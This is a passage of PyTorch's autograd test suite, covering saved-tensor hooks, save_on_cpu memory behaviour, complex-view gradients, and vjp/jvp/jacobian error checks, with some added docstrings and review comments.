with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
pass
def test_pack_hook_with_inplace_modification_should_fail(self):
a = torch.randn(5, requires_grad=True)
def inc(x):
x += 1
return x
with torch.autograd.graph.saved_tensors_hooks(inc, lambda x: x):
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y = torch.exp(a)
y = torch.exp(a)
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y.grad_fn._raw_saved_result.register_hooks(inc, lambda x: x)
def test_saving_variable_to_disk(self):
with tempfile.TemporaryDirectory() as tmp_dir:
def pack(x):
name = os.path.join(tmp_dir, str(uuid.uuid4()))
torch.save(x, name)
return name
def unpack(name):
return torch.load(name)
with torch.autograd.graph.saved_tensors_hooks(pack, unpack):
a = torch.ones(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
    def test_default_saved_variable_hooks_double_backward(self):
        """Default hooks compose multiplicatively under double backward: each
        hooked save of `a` (and of `grad` in pow_backward) scales the result."""
        with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
            a = torch.randn(5, requires_grad=True)
            y = a ** 3
            s = torch.sum(y)
            g, = torch.autograd.grad(s, (a, ), create_graph=True)
            g.sum().backward()
            self.assertEqual(6 * a, a.grad)
        with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
            a = torch.randn(5, requires_grad=True)
            y = a ** 3
            s = torch.sum(y)
            g, = torch.autograd.grad(s, (a, ), create_graph=True)
            g.sum().backward()
            # factor 2 because only a is saved once
            self.assertEqual(6 * 2 * a, a.grad)
        a = torch.randn(5, requires_grad=True)
        y = a ** 3
        s = torch.sum(y)
        with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
            g, = torch.autograd.grad(s, (a, ), create_graph=True)
            g.sum().backward()
            # factor 4 because pow_backward is grad * (exp * self.pow(exp - 1))
            # so grad is saved and self (i.e. a) is saved
            self.assertEqual(6 * 4 * a, a.grad)
        with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
            a = torch.randn(5, requires_grad=True)
            y = a ** 3
            s = torch.sum(y)
            g, = torch.autograd.grad(s, (a, ), create_graph=True)
            g.sum().backward()
            # combining the two above blocks: 2 * 4 = 8
            # note that in that sense, a is saved twice
            self.assertEqual(6 * 8 * a, a.grad)
def test_graph_save_on_cpu(self):
    """save_on_cpu() must preserve saved-tensor identity/dtype/layout and gradients.

    Runs a small a*a graph under save_on_cpu for float, double and sparse
    inputs, with and without pinned memory (and CUDA if available).
    """
    def test(get_input, cuda, pin_memory):
        with torch.autograd.graph.save_on_cpu(pin_memory):
            a = get_input()
            if cuda:
                # NOTE(review): the result of .cuda() is discarded -- Tensor.cuda()
                # is not in-place, so `a` stays on CPU and this branch is a no-op.
                # Likely intended `a = a.cuda()`; confirm before changing, since
                # rebinding would make `a` a non-leaf with no .grad.
                a.cuda()
            y = a * a
            # Both saved operands of mul are `a` itself.
            self.assertEqual(a, y.grad_fn._saved_self)
            self.assertEqual(a, y.grad_fn._saved_other)
            self.assertEqual(a.dtype, y.grad_fn._saved_self.dtype)
            self.assertEqual(a.layout, y.grad_fn._saved_self.layout)
            if y.is_sparse:
                y = y.to_dense()
            y.sum().backward()
            self.assertEqual(2 * a, a.grad)

    for cuda in [False] + ([True] if torch.cuda.is_available() else []):
        for pin_memory in [True, False]:
            # FloatTensor
            test(lambda: torch.randn(5, requires_grad=True), cuda, pin_memory)
            # DoubleTensor
            test(lambda: torch.randn(5, requires_grad=True, dtype=torch.double), cuda, pin_memory)
            # Sparse tensor
            x = torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.]), requires_grad=True)
            test(lambda: x, cuda, pin_memory)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_graph_save_on_cpu_cuda(self):
    """save_on_cpu() should reduce CUDA memory held by the graph to the no-grad level."""
    def f(x):
        a = x + 1
        return a * a

    # with grad
    a = torch.ones(1, requires_grad=True, device="cuda")
    y = f(a)
    memory_with_grad = torch.cuda.memory_allocated()

    del a
    del y

    # without grad
    a = torch.ones(1, requires_grad=True, device="cuda")
    with torch.no_grad():
        y = f(a)
    memory_without_grad = torch.cuda.memory_allocated()

    # The autograd graph's saved tensors cost extra CUDA memory.
    self.assertGreater(memory_with_grad, memory_without_grad)

    del a
    del y

    # with hooks: saved tensors live on CPU, so CUDA usage matches no-grad.
    with torch.autograd.graph.save_on_cpu():
        a = torch.ones(1, requires_grad=True, device="cuda")
        y = f(a)
        memory_with_hooks = torch.cuda.memory_allocated()
        self.assertEqual(memory_with_hooks, memory_without_grad)
def index_perm_variable(shape, max_indices):
    """Return an index tensor of `shape` holding distinct values from range(max_indices)."""
    dims = shape if isinstance(shape, tuple) else (shape,)
    count = reduce(mul, dims)
    # Take the first `count` entries of a random permutation, then reshape.
    return torch.randperm(max_indices).narrow(0, 0, count).view(dims)
def bernoulli_scalar():
    """Return a 0-dim uint8 tensor drawn from Bernoulli(0.5)."""
    scalar = torch.tensor(0, dtype=torch.uint8)
    scalar.bernoulli_()
    return scalar
def gradgradcheck_method_precision_override(test_name):
    """Return looser {'atol', 'rtol'} tolerances for known-noisy gradgradcheck tests, else None.

    Broadcasting variants get their tolerance scaled by S per broadcast
    dimension, since errors accumulate across those dimensions.
    """
    # these are just empirical observations, we should improve
    overrides = {
        'test_norm': {'atol': 2e-2, 'rtol': 1e-2},
        'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2},
        'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2},
        'test_dist': {'atol': 5e-2, 'rtol': 1e-2},
        'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2},
    }
    base_name = test_name.split("_broadcast")[0]
    override = overrides.get(base_name)
    if override:
        # NOTE(review): both scaled entries derive from override['atol']; the
        # rtol base looks like it may have been meant to be override['rtol'].
        # Kept as-is to preserve behavior.
        if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name:
            # errors accumulated across 1 dimension
            override = {'atol': override['atol'] * S, 'rtol': override['atol'] * S}
        elif 'broadcast_all' in test_name:
            # errors accumulated across multiple dimensions
            override = {'atol': override['atol'] * S * S, 'rtol': override['atol'] * S * S}
    return override
def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable,
                                 input_variables, run_gradgradcheck=True, check_batched_grad=True,
                                 check_forward_ad=False):
    """Run gradcheck, then gradgradcheck with any per-test precision override applied."""
    test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION,
                                   check_batched_grad=check_batched_grad, check_forward_ad=check_forward_ad))
    override = gradgradcheck_method_precision_override(test_name)
    if override is None:
        # Default tolerances.
        test_case.assertTrue(gradgradcheck(apply_method, input_variables,
                                           gen_non_contig_grad_outputs=True,
                                           check_batched_grad=check_batched_grad))
    else:
        # Looser, empirically chosen tolerances for this particular test.
        test_case.assertTrue(gradgradcheck(apply_method, input_variables, None,
                                           atol=override['atol'], rtol=override['rtol'],
                                           gen_non_contig_grad_outputs=True,
                                           check_batched_grad=check_batched_grad))
def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks,
                          f_args_variable, f_args_tensor, *, check_forward_ad=False):
    """Apply `apply_fn`, optionally run (grad)gradcheck, then smoke-test one backward pass."""
    output_variable = apply_fn(*f_args_variable)

    if run_grad_checks:
        run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn,
                                     output_variable, f_args_variable, check_forward_ad=check_forward_ad)

    self_variable = f_args_variable[0]
    can_backward = (isinstance(output_variable, torch.Tensor)
                    and output_variable.requires_grad
                    and self_variable is not None)
    if can_backward:
        # Backward with a random grad output and sanity-check grad type/shape.
        output_variable.backward(torch.randn_like(output_variable))
        test_case.assertEqualTypeString(self_variable, self_variable.grad)
        test_case.assertEqual(self_variable.size(), self_variable.grad.size())
class TestAutogradComplex(TestCase):
    """Autograd behavior of complex views (view_as_complex / view_as_real)."""

    def test_view_func_for_complex_views(self):
        """In-place ops through chains of complex views must match the grads of a plain clone+mul."""
        # case 1: both parent and child have view_func
        x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
        y = x.detach().requires_grad_(True)

        x0 = x.clone()
        x1 = torch.view_as_complex(x0)
        x2 = torch.view_as_real(x1)
        x2.mul_(2)
        x2.sum().backward()

        # Reference path: same computation without the view round-trip.
        y0 = y.clone()
        y0.mul_(2)
        y0.sum().backward()

        self.assertEqual(x.grad, y.grad)

        # case 2: parent has view_func but child does not
        x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
        y = x.detach().requires_grad_(True)

        def fn(a):
            b = a.clone()
            b1 = torch.view_as_complex(b)
            b2 = b1.reshape(b1.numel())
            return b2

        x0 = fn(x)
        x0.mul_(2)
        x0.sum().backward()

        y0 = fn(y)
        y1 = y0.mul(2)
        y1.sum().backward()

        self.assertEqual(x.grad, y.grad)

        # case 3: parent does not have a view_func but child does
        x = torch.randn(10, dtype=torch.cdouble, requires_grad=True)
        y = x.detach().requires_grad_(True)

        def fn(a, dim0_size=5):
            b = a.clone()
            b1 = b.reshape(dim0_size, 2)
            b2 = torch.view_as_real(b1)
            return b2

        x0 = fn(x)
        x0.mul_(2)
        x0.sum().backward()

        y0 = fn(y)
        y1 = y0.mul(2)
        y1.sum().backward()

        self.assertEqual(x.grad, y.grad)

    def test_view_with_multi_output(self):
        """In-place modification of one output of a multi-output view (unbind) must raise."""
        x = torch.randn(2, 2, 2, dtype=torch.double)

        x1 = torch.view_as_complex(x)
        # Taking an invalid view should always be allowed as long as it is not
        # modified inplace
        res = x1.unbind(0)

        with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
            res[0] += torch.rand(2, requires_grad=True)

        # Same check with grad tracking enabled on the base tensor.
        x.requires_grad_(True)
        x1 = torch.view_as_complex(x)
        # Taking an invalid view should always be allowed as long as it is not
        # modified inplace
        res = x1.unbind(0)

        with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
            res[0] += torch.rand(2, requires_grad=True)

    def as_identity(self):
        # NOTE(review): this method name lacks the `test_` prefix, so unittest
        # does not collect it automatically -- confirm whether that is intentional.
        # view_as_real and view_as_complex behavior should be like an identity
        def func(z):
            z_ = torch.view_as_complex(z)
            z_select = torch.select(z_, z_.dim() - 1, 0)
            z_select_real = torch.view_as_real(z_select)
            return z_select_real.sum()

        z = torch.randn(10, 2, 2, dtype=torch.double, requires_grad=True)
        gradcheck(func, [z])
        func(z).backward()

        # Reference: a plain select on a clone should give the same grads.
        z1 = z.clone().detach().requires_grad_(True)
        torch.select(z1, z1.dim() - 2, 0).sum().backward()

        self.assertEqual(z.grad, z1.grad)
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors or tuple of Tensors with the same size
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
def test_vjp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.ones(3)
with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
res = autogradF.vjp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
res = autogradF.vjp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
res = autogradF.vjp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.vjp(foo, inp, v[:2])
res = autogradF.vjp(foo, inp, v)[1]
self._assert_same_struct(res, inp)
def test_vjp_err_check_strict(self):
    """strict=True turns silently-zero vjp results into errors; strict=False returns zeros."""
    def foo(a):
        # Output detached from the graph: does not require grad.
        return a.detach()
    def bar(a):
        # Make a non-leaf Tensor that requires_grad but that is not connected to the input
        return a.long().float().requires_grad_().clone()
    inp = torch.rand(4)
    v = torch.rand(4)
    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
        res = autogradF.vjp(foo, inp, v, strict=True)
    # Non-strict: same call succeeds with an all-zero gradient.
    res = autogradF.vjp(foo, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
        res = autogradF.vjp(bar, inp, v, strict=True)
    res = autogradF.vjp(bar, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)

    # The Jacobian does not depend on the input
    def foo(a):
        return a.clone()
    inp.requires_grad_()
    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
        res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
    # Non-strict: identity function, so the vjp is just v.
    res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
    """Under torch.no_grad(), vjp builds no graph unless create_graph=True overrides it."""
    def reducer(x):
        return x.sum(dim=1)
    inputs = torch.rand(4, 4)
    v = torch.ones(4)
    with torch.no_grad():
        res = autogradF.vjp(reducer, inputs, v)
    self.assertIsNone(res[0].grad_fn)
    self.assertIsNone(res[1].grad_fn)
    # The values themselves are still computed, not zeroed.
    self.assertNotEqual(res[1], torch.zeros(4, 4))

    inputs.requires_grad_()
    v.requires_grad_()
    with torch.no_grad():
        # create_graph=True wins over the surrounding no_grad.
        res = autogradF.vjp(reducer, inputs, v, create_graph=True)
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)
    self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
    """vjp returns (outputs, grads) with grads matching input structure; no graph by default."""
    def reducer(x):
        return x.sum(dim=1)
    inputs = torch.rand(4, 4)
    v = torch.ones(4)
    res = autogradF.vjp(reducer, inputs, v)
    self._assert_same_struct(res[1], inputs)
    self.assertIsNone(res[0].grad_fn)
    self.assertIsNone(res[1].grad_fn)

    # Multiple inputs, single output.
    def adder(x, y):
        return 2 * x + 3 * y
    inputs = (torch.rand(2), torch.rand(2))
    v = torch.ones(2)
    out, vjp_val = autogradF.vjp(adder, inputs, v)
    self._assert_same_struct(vjp_val, inputs)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(vjp_val[0].grad_fn)
    self.assertIsNone(vjp_val[1].grad_fn)

    # Multiple inputs and multiple outputs: v is a matching tuple.
    def adder(x, y):
        return 2 * x + 3 * y, x + y
    inputs = (torch.rand(2), torch.rand(2))
    v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
    out, vjp_val = autogradF.vjp(adder, inputs, v)
    self._assert_same_struct(vjp_val, inputs)
    self.assertIsNone(out[0].grad_fn)
    self.assertIsNone(out[1].grad_fn)
    self.assertIsNone(vjp_val[0].grad_fn)
    self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
    """create_graph=True makes vjp outputs differentiable; verified via (grad)gradcheck."""
    def reducer(x):
        return x.sum(dim=1)
    inputs = torch.rand(2, 2, dtype=torch.double)
    v = torch.ones(2, dtype=torch.double)

    inputs.requires_grad_()
    v.requires_grad_()

    res = autogradF.vjp(reducer, inputs, v, create_graph=True)
    self._assert_same_struct(res[1], inputs)
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)

    # NOTE(review): these lambdas close over `inputs` instead of using their
    # `inp` argument -- gradcheck therefore only perturbs `v` here; confirm
    # this is intentional (the jvp variant below uses `inp`).
    gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
    gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))

    def adder(x, y):
        return 2 * x + 3 * y, x * y

    inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
              torch.rand(2, dtype=torch.double, requires_grad=True))
    v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
         torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))

    gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
    gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)

    def foo(*args):
        # Compose vjp into a larger differentiable expression.
        x, y = args[:2]
        v = args[2:]

        x = x.cos()
        val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)

        return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()

    gradcheck(foo, inputs + v)
    gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
res = autogradF.jvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
res = autogradF.jvp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
res = autogradF.jvp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.jvp(foo, inp, (v, v))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.jvp(foo, inp, v[:2])
res = autogradF.jvp(foo, inp, v)[1]
self._assert_same_struct(res, foo(inp))
def test_jvp_err_check_strict(self):
    """strict=True turns silently-zero jvp results into errors; strict=False returns zeros."""
    def foo(a):
        # Output detached from the graph: does not require grad.
        return a.detach()
    def bar(a):
        # Make a non-leaf Tensor that requires_grad but that is not connected to the input
        return a.long().float().requires_grad_().clone()
    inp = torch.rand(4)
    v = torch.rand(4)
    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
        res = autogradF.jvp(foo, inp, v, strict=True)
    # Non-strict: same call succeeds with an all-zero jvp.
    res = autogradF.jvp(foo, inp, v, strict=False)
    self._assert_same_struct(res[1], res[0])
    self.assertEqual(res[1].abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
        res = autogradF.jvp(bar, inp, v, strict=True)
    res = autogradF.jvp(bar, inp, v, strict=False)
    self._assert_same_struct(res[1], res[0])
    self.assertEqual(res[1].abs().sum(), 0.)

    # The Jacobian does not depend on the input
    def foo(a):
        return a.clone()
    inp.requires_grad_()
    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
        res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
    # Non-strict: identity function, so the jvp is just v.
    res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
    """Under torch.no_grad(), jvp builds no graph unless create_graph=True overrides it."""
    def reducer(x):
        return x.sum(dim=1)
    inputs = torch.rand(4, 4)
    v = torch.ones(4, 4)
    with torch.no_grad():
        res = autogradF.jvp(reducer, inputs, v)
    self.assertIsNone(res[0].grad_fn)
    self.assertIsNone(res[1].grad_fn)
    # Values are still computed, not zeroed.
    self.assertNotEqual(res[1], torch.zeros(4, 4))

    inputs.requires_grad_()
    v.requires_grad_()
    with torch.no_grad():
        # create_graph=True wins over the surrounding no_grad.
        res = autogradF.jvp(reducer, inputs, v, create_graph=True)
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)
    self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
    """jvp returns (outputs, jvp) with jvp matching output structure; no graph by default."""
    def reducer(x):
        return x.sum(dim=1)
    inputs = torch.rand(4, 4)
    v = torch.ones(4, 4)
    res = autogradF.jvp(reducer, inputs, v)
    self._assert_same_struct(res[1], res[0])
    self.assertIsNone(res[0].grad_fn)
    self.assertIsNone(res[1].grad_fn)

    # Multiple inputs, single output.
    def adder(x, y):
        return 2 * x + 3 * y
    inputs = (torch.rand(2), torch.rand(2))
    v = (torch.ones(2), torch.ones(2))
    out, jvp_val = autogradF.jvp(adder, inputs, v)
    self._assert_same_struct(jvp_val, out)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(jvp_val[0].grad_fn)
    self.assertIsNone(jvp_val[1].grad_fn)

    # Multiple inputs and multiple outputs.
    def adder(x, y):
        return 2 * x + 3 * y, x + y
    inputs = (torch.rand(2), torch.rand(2))
    v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
    out, jvp_val = autogradF.jvp(adder, inputs, v)
    self._assert_same_struct(jvp_val, out)
    self.assertIsNone(out[0].grad_fn)
    self.assertIsNone(out[1].grad_fn)
    self.assertIsNone(jvp_val[0].grad_fn)
    self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
    """create_graph=True makes jvp outputs differentiable; verified via (grad)gradcheck."""
    def reducer(x):
        return x.sum(dim=1)
    inputs = torch.rand(2, 2, dtype=torch.double)
    v = torch.ones(2, 2, dtype=torch.double)

    inputs.requires_grad_()
    v.requires_grad_()

    res = autogradF.jvp(reducer, inputs, v, create_graph=True)
    self._assert_same_struct(res[1], res[0])
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)

    gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
    gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))

    def adder(x, y):
        return 2 * x + 3 * y, x * y

    inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
              torch.rand(2, dtype=torch.double, requires_grad=True))
    v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
         torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))

    gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
    gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)

    def foo(*args):
        # Compose jvp into a larger differentiable expression.
        x, y = args[:2]
        v = args[2:]

        x = x.cos()
        val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)

        return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()

    gradcheck(foo, inputs + v)
    gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
    """Exercise _construct_standard_basis_for over assorted shapes, scalars, and dtypes."""
    cases = [
        (torch.randn(2, 3),),
        (torch.randn(1),),
        (torch.randn([]),),
        (torch.randn(1), torch.randn([]), torch.randn([])),
        (torch.randn(2), torch.randn(3), torch.randn([])),
        (torch.randn(2), torch.randn([]), torch.randn(3)),
        (torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
        (torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
    ]
    for case in cases:
        self._test_construct_standard_basis_for(case)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
    """Mixed-device inputs: each basis block must live on its input's own device."""
    test_cases = [
        (torch.randn(2), torch.randn(3, device='cuda')),
        (torch.randn(3, device='cuda'), torch.randn(2)),
    ]
    for inputs in test_cases:
        self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
# vmap is an experimental prototype. When someone calls torch.vmap,
# it raises a python warning. This test checks that
# autogradF.{jacobian, hessian} don't raise that experimental prototype
# warning; it is not nice for a public-facing API to raise a warning
# no matter how it is called.
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
    """jacobian(vectorize=True) must emit no warnings."""
    self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
    """hessian(vectorize=True) must emit no warnings."""
    self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
    """jacobian input/output validation plus structure checks for one and two inputs."""
    def foo(a):
        return 3 * a.narrow(0, 0, 3)
    def bar(a):
        # Non-Tensor in the output tuple: invalid.
        return 3 * a.narrow(0, 0, 3), "bar"
    inp = torch.rand(4)
    with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
        res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
    with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
        res = autogradF.jacobian(bar, inp, vectorize=vectorize)

    # Valid single-input call: jacobian interleaves output and input shapes.
    res = autogradF.jacobian(foo, inp, vectorize=vectorize)
    self._assert_interleaved_struct(res, foo(inp), inp)

    def foo(a, b):
        return b, 3 * a.narrow(0, 0, 3)
    inp = (torch.rand(4), torch.rand(5))
    res = autogradF.jacobian(foo, inp, vectorize=vectorize)
    self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
    """Error checks for the default (non-vectorized) jacobian path."""
    return self._test_jacobian_err_check(False)
def test_jacobian_err_check_vectorize(self):
    """Error checks for the vectorized jacobian path."""
    return self._test_jacobian_err_check(True)
def test_jacobian_err_check_strict(self):
    """strict=True converts silently-zero jacobians into errors; strict=False returns zeros."""
    def foo(a):
        # Output detached from the graph: does not require grad.
        return a.detach()
    def bar(a):
        # Make a non-leaf Tensor that requires_grad but that is not connected to the input
        return a.long().float().requires_grad_().clone()
    inp = torch.rand(4)
